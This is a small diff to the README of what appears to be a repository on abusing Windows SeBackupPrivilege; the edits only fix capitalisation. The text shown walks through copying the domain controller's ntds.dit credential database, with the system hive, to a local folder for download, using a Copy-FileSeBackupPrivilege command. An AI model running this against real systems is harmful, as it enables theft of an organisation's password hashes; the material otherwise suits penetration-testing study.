k4sth4/SeBackupPrivilege/README.md

 ```

 ### Now you can copy any file
-copy any file to present dir and then download it to your system
+Copy any file to present dir and then download it to your system.

-We gonna get ntds.dit and system
+We gonna get ntds.dit and system.
 ```markdown
 Copy-FileSeBackupPrivilege z:\\Windows\\ntds\\ntds.dit c:\\programdata\\ntds.dit
 ```